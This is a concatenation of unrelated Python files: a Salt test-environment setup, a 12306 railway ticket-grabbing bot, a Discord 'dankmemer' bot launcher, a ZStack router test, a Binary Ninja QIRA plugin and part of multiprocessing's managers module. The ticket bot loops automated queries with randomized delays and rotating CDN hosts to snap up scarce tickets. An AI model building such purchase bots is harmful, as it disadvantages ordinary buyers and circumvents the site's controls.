os.path.join(FILES, 'pillar', 'base'),
]
}
minion_opts['pillar_roots'] = {
'base': [
RUNTIME_VARS.TMP_PILLAR_TREE,
os.path.join(FILES, 'pillar', 'base'),
]
}
master_opts['file_roots'] = syndic_master_opts['file_roots'] = {
'base': [
os.path.join(FILES, 'file', 'base'),
# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
RUNTIME_VARS.TMP_STATE_TREE
],
# Alternate root to test __env__ choices
'prod': [
os.path.join(FILES, 'file', 'prod'),
RUNTIME_VARS.TMP_PRODENV_STATE_TREE
]
}
minion_opts['file_roots'] = {
'base': [
os.path.join(FILES, 'file', 'base'),
# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
RUNTIME_VARS.TMP_STATE_TREE
],
# Alternate root to test __env__ choices
'prod': [
os.path.join(FILES, 'file', 'prod'),
RUNTIME_VARS.TMP_PRODENV_STATE_TREE
]
}
master_opts.setdefault('reactor', []).append(
{
'salt/minion/*/start': [
os.path.join(FILES, 'reactor-sync-minion.sls')
],
}
)
for opts_dict in (master_opts, syndic_master_opts):
if 'ext_pillar' not in opts_dict:
opts_dict['ext_pillar'] = []
if salt.utils.platform.is_windows():
opts_dict['ext_pillar'].append(
{'cmd_yaml': 'type {0}'.format(os.path.join(FILES, 'ext.yaml'))})
else:
opts_dict['ext_pillar'].append(
{'cmd_yaml': 'cat {0}'.format(os.path.join(FILES, 'ext.yaml'))})
# all read, only owner write
autosign_file_permissions = stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH | stat.S_IWUSR
for opts_dict in (master_opts, syndic_master_opts):
# We need to copy the extension modules into the new master root_dir or
# it will be prefixed by it
new_extension_modules_path = os.path.join(opts_dict['root_dir'], 'extension_modules')
if not os.path.exists(new_extension_modules_path):
shutil.copytree(
os.path.join(
INTEGRATION_TEST_DIR, 'files', 'extension_modules'
),
new_extension_modules_path
)
opts_dict['extension_modules'] = os.path.join(opts_dict['root_dir'], 'extension_modules')
# Copy the autosign_file to the new master root_dir
new_autosign_file_path = os.path.join(opts_dict['root_dir'], 'autosign_file')
shutil.copyfile(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'autosign_file'),
new_autosign_file_path
)
os.chmod(new_autosign_file_path, autosign_file_permissions)
# Point the config values to the correct temporary paths
for name in ('hosts', 'aliases'):
optname = '{0}.file'.format(name)
optname_path = os.path.join(TMP, name)
master_opts[optname] = optname_path
minion_opts[optname] = optname_path
sub_minion_opts[optname] = optname_path
syndic_opts[optname] = optname_path
syndic_master_opts[optname] = optname_path
proxy_opts[optname] = optname_path
master_opts['runtests_conn_check_port'] = get_unused_localhost_port()
minion_opts['runtests_conn_check_port'] = get_unused_localhost_port()
sub_minion_opts['runtests_conn_check_port'] = get_unused_localhost_port()
syndic_opts['runtests_conn_check_port'] = get_unused_localhost_port()
syndic_master_opts['runtests_conn_check_port'] = get_unused_localhost_port()
proxy_opts['runtests_conn_check_port'] = get_unused_localhost_port()
for conf in (master_opts, minion_opts, sub_minion_opts, syndic_opts, syndic_master_opts, proxy_opts):
if 'engines' not in conf:
conf['engines'] = []
conf['engines'].append({'salt_runtests': {}})
if 'engines_dirs' not in conf:
conf['engines_dirs'] = []
conf['engines_dirs'].insert(0, ENGINES_DIR)
if 'log_handlers_dirs' not in conf:
conf['log_handlers_dirs'] = []
conf['log_handlers_dirs'].insert(0, LOG_HANDLERS_DIR)
conf['runtests_log_port'] = SALT_LOG_PORT
# ----- Transcribe Configuration ---------------------------------------------------------------------------->
for entry in os.listdir(RUNTIME_VARS.CONF_DIR):
if entry in ('master', 'minion', 'sub_minion', 'syndic', 'syndic_master', 'proxy'):
# These have runtime computed values and will be handled
# differently
continue
entry_path = os.path.join(RUNTIME_VARS.CONF_DIR, entry)
if os.path.isfile(entry_path):
shutil.copy(
entry_path,
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry)
)
elif os.path.isdir(entry_path):
shutil.copytree(
entry_path,
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry)
)
for entry in ('master', 'minion', 'sub_minion', 'syndic', 'syndic_master', 'proxy'):
computed_config = copy.deepcopy(locals()['{0}_opts'.format(entry)])
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry), 'w') as fp_:
salt.utils.yaml.safe_dump(computed_config, fp_, default_flow_style=False)
sub_minion_computed_config = copy.deepcopy(sub_minion_opts)
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, 'minion'), 'w') as wfh:
salt.utils.yaml.safe_dump(sub_minion_computed_config, wfh, default_flow_style=False)
shutil.copyfile(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'master'), os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, 'master'))
syndic_master_computed_config = copy.deepcopy(syndic_master_opts)
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, 'master'), 'w') as wfh:
salt.utils.yaml.safe_dump(syndic_master_computed_config, wfh, default_flow_style=False)
syndic_computed_config = copy.deepcopy(syndic_opts)
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'minion'), 'w') as wfh:
salt.utils.yaml.safe_dump(syndic_computed_config, wfh, default_flow_style=False)
shutil.copyfile(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'master'), os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'master'))
# <---- Transcribe Configuration -----------------------------------------------------------------------------
# ----- Verify Environment ---------------------------------------------------------------------------------->
master_opts = salt.config.master_config(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'master'))
minion_opts = salt.config.minion_config(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'minion'))
syndic_opts = salt.config.syndic_config(
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'master'),
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'minion'),
)
sub_minion_opts = salt.config.minion_config(os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, 'minion'))
syndic_master_opts = salt.config.master_config(os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, 'master'))
proxy_opts = salt.config.proxy_config(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'proxy'))
RUNTIME_VARS.RUNTIME_CONFIGS['master'] = freeze(master_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['minion'] = freeze(minion_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['syndic'] = freeze(syndic_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['sub_minion'] = freeze(sub_minion_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['syndic_master'] = freeze(syndic_master_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['proxy'] = freeze(proxy_opts)
verify_env([os.path.join(master_opts['pki_dir'], 'minions'),
os.path.join(master_opts['pki_dir'], 'minions_pre'),
os.path.join(master_opts['pki_dir'], 'minions_rejected'),
os.path.join(master_opts['pki_dir'], 'minions_denied'),
os.path.join(master_opts['cachedir'], 'jobs'),
os.path.join(master_opts['root_dir'], 'cache', 'tokens'),
os.path.join(syndic_master_opts['pki_dir'], 'minions'),
os.path.join(syndic_master_opts['pki_dir'], 'minions_pre'),
os.path.join(syndic_master_opts['pki_dir'], 'minions_rejected'),
os.path.join(syndic_master_opts['cachedir'], 'jobs'),
os.path.join(syndic_master_opts['root_dir'], 'cache', 'tokens'),
os.path.join(master_opts['pki_dir'], 'accepted'),
os.path.join(master_opts['pki_dir'], 'rejected'),
os.path.join(master_opts['pki_dir'], 'pending'),
os.path.join(syndic_master_opts['pki_dir'], 'accepted'),
os.path.join(syndic_master_opts['pki_dir'], 'rejected'),
os.path.join(syndic_master_opts['pki_dir'], 'pending'),
os.path.join(minion_opts['pki_dir'], 'accepted'),
os.path.join(minion_opts['pki_dir'], 'rejected'),
os.path.join(minion_opts['pki_dir'], 'pending'),
os.path.join(sub_minion_opts['pki_dir'], 'accepted'),
os.path.join(sub_minion_opts['pki_dir'], 'rejected'),
os.path.join(sub_minion_opts['pki_dir'], 'pending'),
os.path.dirname(master_opts['log_file']),
minion_opts['extension_modules'],
sub_minion_opts['extension_modules'],
sub_minion_opts['pki_dir'],
master_opts['sock_dir'],
syndic_master_opts['sock_dir'],
sub_minion_opts['sock_dir'],
minion_opts['sock_dir'],
RUNTIME_VARS.TMP_STATE_TREE,
RUNTIME_VARS.TMP_PILLAR_TREE,
RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
TMP,
],
RUNTIME_VARS.RUNNING_TESTS_USER,
root_dir=master_opts['root_dir'],
)
cls.master_opts = master_opts
cls.minion_opts = minion_opts
# cls.proxy_opts = proxy_opts
cls.sub_minion_opts = sub_minion_opts
cls.syndic_opts = syndic_opts
cls.syndic_master_opts = syndic_master_opts
cls.proxy_opts = proxy_opts
# <---- Verify Environment -----------------------------------------------------------------------------------
def __exit__(self, type, value, traceback):
'''
Kill the minion and master processes
'''
self.sub_minion_process.terminate()
self.minion_process.terminate()
if hasattr(self, 'proxy_process'):
self.proxy_process.terminate()
self.master_process.terminate()
try:
self.syndic_process.terminate()
except AttributeError:
pass
try:
self.smaster_process.terminate()
except AttributeError:
pass
#salt.utils.process.clean_proc(self.sub_minion_process, wait_for_kill=50)
#self.sub_minion_process.join()
#salt.utils.process.clean_proc(self.minion_process, wait_for_kill=50)
#self.minion_process.join()
#salt.utils.process.clean_proc(self.master_process, wait_for_kill=50)
#self.master_process.join()
#try:
# salt.utils.process.clean_proc(self.syndic_process, wait_for_kill=50)
# self.syndic_process.join()
#except AttributeError:
# pass
#try:
# salt.utils.process.clean_proc(self.smaster_process, wait_for_kill=50)
# self.smaster_process.join()
#except AttributeError:
# pass
self.log_server.server_close()
self.log_server.shutdown()
self._exit_mockbin()
self._exit_ssh()
self.log_server_process.join()
# Shutdown the multiprocessing logging queue listener
salt_log_setup.shutdown_multiprocessing_logging()
salt_log_setup.shutdown_multiprocessing_logging_listener(daemonizing=True)
def pre_setup_minions(self):
'''
Subclass this method for additional minion setups.
'''
def setup_minions(self):
'''
Minions setup routines
'''
def post_setup_minions(self):
'''
Subclass this method to execute code after the minions have been setup
'''
def _enter_mockbin(self):
path = os.environ.get('PATH', '')
path_items = path.split(os.pathsep)
if MOCKBIN not in path_items:
path_items.insert(0, MOCKBIN)
os.environ['PATH'] = os.pathsep.join(path_items)
def _exit_ssh(self):
if hasattr(self, 'sshd_process'):
try:
self.sshd_process.kill()
except OSError as exc:
if exc.errno != 3:
raise
with salt.utils.files.fopen(self.sshd_pidfile) as fhr:
try:
os.kill(int(fhr.read()), signal.SIGKILL)
except OSError as exc:
if exc.errno != 3:
raise
def _exit_mockbin(self):
path = os.environ.get('PATH', '')
path_items = path.split(os.pathsep)
try:
path_items.remove(MOCKBIN)
except ValueError:
pass
os.environ['PATH'] = os.pathsep.join(path_items)
@classmethod
def clean(cls):
'''
Clean out the tmp files
'''
def remove_readonly(func, path, excinfo):
# Give full permissions to owner
os.chmod(path, stat.S_IRWXU)
func(path)
for dirname in (TMP, RUNTIME_VARS.TMP_STATE_TREE,
RUNTIME_VARS.TMP_PILLAR_TREE, RUNTIME_VARS.TMP_PRODENV_STATE_TREE):
if os.path.isdir(dirname):
try:
shutil.rmtree(six.text_type(dirname), onerror=remove_readonly)
except Exception:
log.exception('Failed to remove directory: %s', dirname)
def wait_for_jid(self, targets, jid, timeout=120):
time.sleep(1) # Allow some time for minions to accept jobs
now = datetime.now()
expire = now + timedelta(seconds=timeout)
job_finished = False
while now <= expire:
running = self.__client_job_running(targets, jid)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
if not running and job_finished is False:
# Let's not have false positives and wait one more seconds
job_finished = True
elif not running and job_finished is True:
return True
elif running and job_finished is True:
job_finished = False
if job_finished is False:
sys.stdout.write(
' * {LIGHT_YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
'{0}'.format(expire - now).rsplit('.', 1)[0],
', '.join(running),
**self.colors
)
)
sys.stdout.flush()
time.sleep(1)
now = datetime.now()
else: # pylint: disable=W0120
sys.stdout.write(
'\n {LIGHT_RED}*{ENDC} ERROR: Failed to get information '
'back\n'.format(**self.colors)
)
sys.stdout.flush()
return False
def __client_job_running(self, targets, jid):
running = self.client.cmd(
list(targets), 'saltutil.running', tgt_type='list'
)
return [
k for (k, v) in six.iteritems(running) if v and v[0]['jid'] == jid
]
def wait_for_minion_connections(self, targets, timeout):
salt.utils.process.appendproctitle('WaitForMinionConnections')
sys.stdout.write(
' {LIGHT_BLUE}*{ENDC} Waiting at most {0} for minions({1}) to '
'connect back\n'.format(
(timeout > 60 and
timedelta(seconds=timeout) or
'{0} secs'.format(timeout)),
', '.join(targets),
**self.colors
)
)
sys.stdout.flush()
expected_connections = set(targets)
now = datetime.now()
expire = now + timedelta(seconds=timeout)
while now <= expire:
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
'{0}'.format(expire - now).rsplit('.', 1)[0],
', '.join(expected_connections),
**self.colors
)
)
sys.stdout.flush()
try:
responses = self.client.cmd(
list(expected_connections), 'test.ping', tgt_type='list',
)
# we'll get this exception if the master process hasn't finished starting yet
except SaltClientError:
time.sleep(0.1)
now = datetime.now()
continue
for target in responses:
if target not in expected_connections:
# Someone(minion) else "listening"?
continue
expected_connections.remove(target)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns',
PNUM)
)
)
sys.stdout.write(
' {LIGHT_GREEN}*{ENDC} {0} connected.\n'.format(
target, **self.colors
)
)
sys.stdout.flush()
if not expected_connections:
return
time.sleep(1)
now = datetime.now()
else: # pylint: disable=W0120
print(
'\n {LIGHT_RED}*{ENDC} WARNING: Minions failed to connect '
'back. Tests requiring them WILL fail'.format(**self.colors)
)
try:
print_header(
'=', sep='=', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('=', sep='=', inline=True)
raise SystemExit()
def sync_minion_modules_(self, modules_kind, targets, timeout=None):
if not timeout:
timeout = 120
# Let's sync all connected minions
print(
' {LIGHT_BLUE}*{ENDC} Syncing minion\'s {1} '
'(saltutil.sync_{1})'.format(
', '.join(targets),
modules_kind,
**self.colors
)
)
syncing = set(targets)
jid_info = self.client.run_job(
list(targets), 'saltutil.sync_{0}'.format(modules_kind),
tgt_type='list',
timeout=999999999999999,
)
if self.wait_for_jid(targets, jid_info['jid'], timeout) is False:
print(
' {LIGHT_RED}*{ENDC} WARNING: Minions failed to sync {0}. '
'Tests requiring these {0} WILL fail'.format(
modules_kind, **self.colors)
)
raise SystemExit()
while syncing:
rdata = self.client.get_full_returns(jid_info['jid'], syncing, 1)
if rdata:
for name, output in six.iteritems(rdata):
if not output['ret']:
# Already synced!?
syncing.remove(name)
continue
if isinstance(output['ret'], six.string_types):
# An errors has occurred
print(
' {LIGHT_RED}*{ENDC} {0} Failed to sync {2}: '
'{1}'.format(
name, output['ret'],
modules_kind,
**self.colors)
)
return False
print(
' {LIGHT_GREEN}*{ENDC} Synced {0} {2}: '
'{1}'.format(
name,
', '.join(output['ret']),
modules_kind, **self.colors
)
)
# Synced!
try:
syncing.remove(name)
except KeyError:
print(
' {LIGHT_RED}*{ENDC} {0} already synced??? '
'{1}'.format(name, output, **self.colors)
)
return True
def sync_minion_states(self, targets, timeout=None):
salt.utils.process.appendproctitle('SyncMinionStates')
self.sync_minion_modules_('states', targets, timeout=timeout)
def sync_minion_modules(self, targets, timeout=None):
salt.utils.process.appendproctitle('SyncMinionModules')
self.sync_minion_modules_('modules', targets, timeout=timeout)
def sync_minion_grains(self, targets, timeout=None):
salt.utils.process.appendproctitle('SyncMinionGrains')
self.sync_minion_modules_('grains', targets, timeout=timeout)
|
select_ticket_info.py
|
# -*- coding=utf-8 -*-
import datetime
import random
import os
import socket
import sys
import threading
import time
import TickerConfig
import wrapcache
from agency.cdn_utils import CDNProxy, open_cdn_file
from config import urlConf, configCommon
from config.TicketEnmu import ticket
from config.configCommon import seat_conf_2, seat_conf
from config.getCookie import getDrvicesID
from init.login import GoLogin
from inter.AutoSubmitOrderRequest import autoSubmitOrderRequest
from inter.ChechFace import chechFace
from inter.CheckUser import checkUser
from inter.GetPassengerDTOs import getPassengerDTOs
from inter.LiftTicketInit import liftTicketInit
from inter.Query import query
from inter.SubmitOrderRequest import submitOrderRequest
from myException.PassengerUserException import PassengerUserException
from myException.UserPasswordException import UserPasswordException
from myException.ticketConfigException import ticketConfigException
from myException.ticketIsExitsException import ticketIsExitsException
from myException.ticketNumOutException import ticketNumOutException
from myUrllib.httpUtils import HTTPClient
class select:
"""
快速提交车票通道
"""
def __init__(self):
self.cdn_list = open_cdn_file("filter_cdn_list")
self.get_ticket_info()
self._station_seat = [seat_conf[x] for x in TickerConfig.SET_TYPE]
self.auto_code_type = TickerConfig.AUTO_CODE_TYPE
self.httpClint = HTTPClient(TickerConfig.IS_PROXY)
self.httpClint.cdn = self.cdn_list[random.randint(0, len(self.cdn_list) - 1)]
self.urls = urlConf.urls
self.login = GoLogin(self, TickerConfig.IS_AUTO_CODE, self.auto_code_type)
self.cookies = ""
self.queryUrl = "leftTicket/queryO"
self.passengerTicketStrList = ""
self.passengerTicketStrByAfterLate = ""
self.oldPassengerStr = ""
self.set_type = ""
self.flag = True
@staticmethod
def get_ticket_info():
"""
获取配置信息
:return:
"""
print(u"*" * 50)
print(f"检查当前版本为: {TickerConfig.RE_VERSION}")
version = sys.version.split(" ")[0]
print(u"检查当前python版本为:{},目前版本只支持3.6以上".format(version))
if version < "3.6.0":
raise Exception
print(u"12306刷票小助手,最后更新于2019.09.18,请勿作为商业用途,交流群号:"
u" 1群:286271084(已满)\n"
u" 2群:649992274(已满)\n"
u" 3群:632501142(已满)\n"
u" 4群: 606340519(已满)\n"
u" 5群: 948526733(已满)\n"
u" 7群: 660689659(已满)\n"
u" 8群: 620629239(已满)\n"
u" 6群: 608792930(未满)\n"
u" 9群: 693035807(未满)\n"
)
print(
f"当前配置:\n出发站:{TickerConfig.FROM_STATION}\n到达站:{TickerConfig.TO_STATION}\n车次: {','.join(TickerConfig.STATION_TRAINS) or '所有车次'}\n乘车日期:{','.join(TickerConfig.STATION_DATES)}\n坐席:{','.join(TickerConfig.SET_TYPE)}\n是否有票优先提交:{TickerConfig.IS_MORE_TICKET}\n乘车人:{TickerConfig.TICKET_PEOPLES}\n" \
f"刷新间隔: 随机(1-3S)\n僵尸票关小黑屋时长: {TickerConfig.TICKET_BLACK_LIST_TIME}\n下单接口: {TickerConfig.ORDER_TYPE}\n下单模式: {TickerConfig.ORDER_MODEL}\n预售踩点时间:{TickerConfig.OPEN_TIME}")
print(u"*" * 50)
def station_table(self, from_station, to_station):
"""
读取车站信息
:param station:
:return:
"""
path = os.path.join(os.path.dirname(__file__), '../station_name.txt')
try:
with open(path, encoding="utf-8") as result:
info = result.read().split('=')[1].strip("'").split('@')
except Exception:
with open(path) as result:
info = result.read().split('=')[1].strip("'").split('@')
del info[0]
station_name = {}
for i in range(0, len(info)):
n_info = info[i].split('|')
station_name[n_info[1]] = n_info[2]
try:
from_station = station_name[from_station.encode("utf8")]
to_station = station_name[to_station.encode("utf8")]
except KeyError:
from_station = station_name[from_station]
to_station = station_name[to_station]
return from_station, to_station
def call_login(self, auth=False):
"""
登录回调方法
:return:
"""
if auth:
return self.login.auth()
else:
configCommon.checkSleepTime(self) # 防止网上启动晚上到点休眠
self.login.go_login()
def main(self):
l = liftTicketInit(self)
l.reqLiftTicketInit()
getDrvicesID(self)
self.call_login()
check_user = checkUser(self)
t = threading.Thread(target=check_user.sendCheckUser)
t.setDaemon(True)
t.start()
from_station, to_station = self.station_table(TickerConfig.FROM_STATION, TickerConfig.TO_STATION)
num = 0
s = getPassengerDTOs(session=self, ticket_peoples=TickerConfig.TICKET_PEOPLES)
passenger = s.sendGetPassengerDTOs()
wrapcache.set("user_info", passenger, timeout=9999999)
while 1:
try:
num += 1
now = datetime.datetime.now() # 感谢群里大佬提供整点代码
configCommon.checkSleepTime(self) # 晚上到点休眠
if TickerConfig.ORDER_MODEL is 1:
sleep_time_s = 0.5
sleep_time_t = 0.6
# 测试了一下有微妙级的误差,应该不影响,测试结果:2019-01-02 22:30:00.004555,预售还是会受到前一次刷新的时间影响,暂时没想到好的解决方案
while not now.strftime("%H:%M:%S") == TickerConfig.OPEN_TIME:
now = datetime.datetime.now()
if now.strftime("%H:%M:%S") > TickerConfig.OPEN_TIME:
break
time.sleep(0.0001)
else:
sleep_time_s = TickerConfig.MIN_TIME
sleep_time_t = TickerConfig.MAX_TIME
q = query(session=self,
from_station=from_station,
to_station=to_station,
from_station_h=TickerConfig.FROM_STATION,
to_station_h=TickerConfig.TO_STATION,
_station_seat=self._station_seat,
station_trains=TickerConfig.STATION_TRAINS,
station_dates=TickerConfig.STATION_DATES,
ticke_peoples_num=len(TickerConfig.TICKET_PEOPLES),
)
queryResult = q.sendQuery()
# 查询接口
if queryResult.get("status", False):
train_no = queryResult.get("train_no", "")
train_date = queryResult.get("train_date", "")
stationTrainCode = queryResult.get("stationTrainCode", "")
secretStr = queryResult.get("secretStr", "")
secretList = queryResult.get("secretList", "")
seat = queryResult.get("seat", "")
leftTicket = queryResult.get("leftTicket", "")
query_from_station_name = queryResult.get("query_from_station_name", "")
query_to_station_name = queryResult.get("query_to_station_name", "")
is_more_ticket_num = queryResult.get("is_more_ticket_num", len(TickerConfig.TICKET_PEOPLES))
if wrapcache.get(train_no):
print(ticket.QUEUE_WARNING_MSG.format(train_no))
else:
# 获取联系人
s = getPassengerDTOs(session=self, ticket_peoples=TickerConfig.TICKET_PEOPLES,
set_type="" if isinstance(seat, list) else seat_conf_2[seat],
# 候补订单需要设置多个坐席
is_more_ticket_num=is_more_ticket_num)
getPassengerDTOsResult = s.getPassengerTicketStrListAndOldPassengerStr(secretStr, secretList)
if getPassengerDTOsResult.get("status", False):
self.passengerTicketStrList = getPassengerDTOsResult.get("passengerTicketStrList", "")
self.passengerTicketStrByAfterLate = getPassengerDTOsResult.get(
"passengerTicketStrByAfterLate", "")
self.oldPassengerStr = getPassengerDTOsResult.get("oldPassengerStr", "")
self.set_type = getPassengerDTOsResult.get("set_type", "")
# 提交订单
# 订单分为两种,一种为抢单,一种为候补订单
if secretStr: # 正常下单
if TickerConfig.ORDER_TYPE == 1: # 快速下单
a = autoSubmitOrderRequest(session=self,
secretStr=secretStr,
train_date=train_date,
passengerTicketStr=self.passengerTicketStrList,
oldPassengerStr=self.oldPassengerStr,
train_no=train_no,
stationTrainCode=stationTrainCode,
leftTicket=leftTicket,
set_type=self.set_type,
query_from_station_name=query_from_station_name,
query_to_station_name=query_to_station_name,
)
a.sendAutoSubmitOrderRequest()
elif TickerConfig.ORDER_TYPE == 2: # 普通下单
sor = submitOrderRequest(self, secretStr, from_station, to_station, train_no,
self.set_type,
self.passengerTicketStrList, self.oldPassengerStr, train_date,
TickerConfig.TICKET_PEOPLES)
sor.sendSubmitOrderRequest()
elif secretList: # 候补订单
c = chechFace(self, secretList, train_no)
c.sendChechFace()
else:
random_time = round(random.uniform(sleep_time_s, sleep_time_t), 2)
nateMsg = ' 无候补机会' if TickerConfig.ORDER_TYPE == 2 else ""
print(f"正在第{num}次查询 随机停留时长:{random_time} 乘车日期: {','.join(TickerConfig.STATION_DATES)} 车次:{','.join(TickerConfig.STATION_TRAINS) or '所有车次'} 下单无票{nateMsg} 耗时:{(datetime.datetime.now() - now).microseconds / 1000}ms")
time.sleep(random_time)
except PassengerUserException as e:
print(e)
break
except ticketConfigException as e:
print(e)
break
except ticketIsExitsException as e:
print(e)
break
except ticketNumOutException as e:
print(e)
break
except UserPasswordException as e:
print(e)
break
except ValueError as e:
if e == "No JSON object could be decoded":
print(u"12306接口无响应,正在重试")
else:
print(e)
except KeyError as e:
print(e)
except TypeError as e:
print(u"12306接口无响应,正在重试 {0}".format(e))
except socket.error as e:
print(e)
if __name__ == '__main__':
s = select()
cdn = s.station_table("长沙", "深圳")
|
main.py
|
import multiprocessing
for bot in ('dankmemerSend', 'dankmemerReact'):
p = multiprocessing.Process(target=lambda: __import__(bot))
p.start()
|
test_start_vrs_simultaneously.py
|
'''
Test stop all vrs, then start them simultaneously
@author: Youyk
'''
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.operations.config_operations as con_ops
import zstackwoodpecker.operations.vm_operations as vm_ops
import zstackwoodpecker.operations.net_operations as net_ops
import zstackwoodpecker.operations.account_operations as acc_ops
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import threading
import time
import apibinding.inventory as inventory
import sys
import os
session_uuid = None
test_stub = test_lib.lib_get_test_stub()
exc_info = []
def start_vm(vm_uuid):
try:
vm_ops.start_vm(vm_uuid, session_uuid)
except:
exc_info.append(sys.exc_info())
def check_exception():
if exc_info:
info1 = exc_info[0][1]
info2 = exc_info[0][2]
raise info1, None, info2
def stop_vm(vm_uuid):
try:
vm_ops.stop_vm(vm_uuid, session_uuid)
except:
exc_info.append(sys.exc_info())
def test():
global session_uuid
session_uuid = acc_ops.login_as_admin()
l3_1_name = os.environ.get('l3VlanNetworkName1')
l3_2_name = os.environ.get('l3VlanDNATNetworkName')
l3_3_name = os.environ.get('l3VlanNetworkName3')
l3_4_name = os.environ.get('l3VlanNetworkName5')
l3_1 = test_lib.lib_get_l3_by_name(l3_1_name)
l3_2 = test_lib.lib_get_l3_by_name(l3_2_name)
l3_3 = test_lib.lib_get_l3_by_name(l3_3_name)
l3_4 = test_lib.lib_get_l3_by_name(l3_4_name)
#create 4 VRs.
vrs = test_lib.lib_find_vr_by_l3_uuid(l3_1.uuid)
if not vrs:
vm = test_stub.create_vlan_vm(l3_name=l3_1_name)
vm.destroy()
vr1 = test_lib.lib_find_vr_by_l3_uuid(l3_1.uuid)[0]
else:
vr1 = vrs[0]
vrs = test_lib.lib_find_vr_by_l3_uuid(l3_2.uuid)
if not vrs:
vm = test_stub.create_vlan_vm(l3_name=l3_2_name)
vm.destroy()
vr2 = test_lib.lib_find_vr_by_l3_uuid(l3_2.uuid)[0]
else:
vr2 = vrs[0]
vrs = test_lib.lib_find_vr_by_l3_uuid(l3_3.uuid)
if not vrs:
vm = test_stub.create_vlan_vm(l3_name=l3_3_name)
vm.destroy()
vr3 = test_lib.lib_find_vr_by_l3_uuid(l3_3.uuid)[0]
else:
vr3 = vrs[0]
vrs = test_lib.lib_find_vr_by_l3_uuid(l3_4.uuid)
if not vrs:
vm = test_stub.create_vlan_vm(l3_name=l3_4_name)
vm.destroy()
vr4 = test_lib.lib_find_vr_by_l3_uuid(l3_4.uuid)[0]
else:
vr4 = vrs[0]
vrs = [vr1, vr2, vr3, vr4]
for vr in vrs:
thread = threading.Thread(target=stop_vm, args=(vr.uuid,))
thread.start()
while threading.activeCount() > 1:
check_exception()
time.sleep(0.1)
check_exception()
for vr in vrs:
thread = threading.Thread(target=start_vm, args=(vr.uuid,))
thread.start()
time.sleep(1)
acc_ops.logout(session_uuid)
while threading.activeCount() > 1:
check_exception()
time.sleep(0.1)
check_exception()
test_util.test_pass('Test start VRs simultaneously success')
def error_cleanup():
global session_uuid
acc_ops.logout(session_uuid)
|
__init__.py
|
# -*- coding: utf-8 -*-
from binaryninja import *
from qirawebsocket import *
import threading
import time
import os
wsserver = None
msg_queue = []
bv = None
def plugin_start(asdf, function):
global bv
bv = asdf
#sync_ninja_comments()
threading.Thread(target=start_server).start()
def handle_message_queue():
global msg_queue
while len(msg_queue) > 0:
dat = msg_queue[0].split(" ")
msg_queue = msg_queue[1:]
if dat[0] == "setaddress" and dat[1] != "undefined":
try:
a = int(str(dat[1][2:]),16)
set_ninja_address(a)
except e:
print ("[QIRA Plugin] Error processing the address\n")
def start_server():
global wsserver
wsserver = SimpleWebSocketServer('', 3003, QiraServer)
if wsserver is not None:
wsserver.serveforever()
def ws_send(msg):
global wsserver
if (wsserver is not None) and (msg is not None):
for conn in wsserver.connections.itervalues():
conn.sendMessage(msg)
def set_ninja_address(addr):
global bv
bv.file.navigate(bv.file.view,addr)
def sync_ninja_comments(bv):
for function in bv.functions:
for addr, comment in function.comments.iteritems():
ws_send("setcmt %s %s" % (hex(int(addr)), comment))
class QiraServer(WebSocket):
def handleMessage(self):
print self.data
msg_queue.append(self.data)
handle_message_queue()
PluginCommand.register_for_address("Qira-Ninja", "Since R2 is for madmen", plugin_start)
PluginCommand.register('Sync comments', 'Sync comments', sync_ninja_comments)
|
managers.py
|
#
# Module providing the `SyncManager` class for dealing
# with shared objects
#
# multiprocessing/managers.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
__all__ = [ 'BaseManager', 'SyncManager', 'BaseProxy', 'Token' ]
#
# Imports
#
import sys
import threading
import array
import queue
from time import time as _time
from traceback import format_exc
from . import connection
from . import context
from . import pool
from . import process
from . import reduction
from . import util
from . import get_context
#
# Register some things for pickling
#
def reduce_array(a):
return array.array, (a.typecode, a.tobytes())
reduction.register(array.array, reduce_array)
view_types = [type(getattr({}, name)()) for name in ('items','keys','values')]
if view_types[0] is not list: # only needed in Py3.0
def rebuild_as_list(obj):
return list, (list(obj),)
for view_type in view_types:
reduction.register(view_type, rebuild_as_list)
#
# Type for identifying shared objects
#
class Token(object):
'''
Type to uniquely indentify a shared object
'''
__slots__ = ('typeid', 'address', 'id')
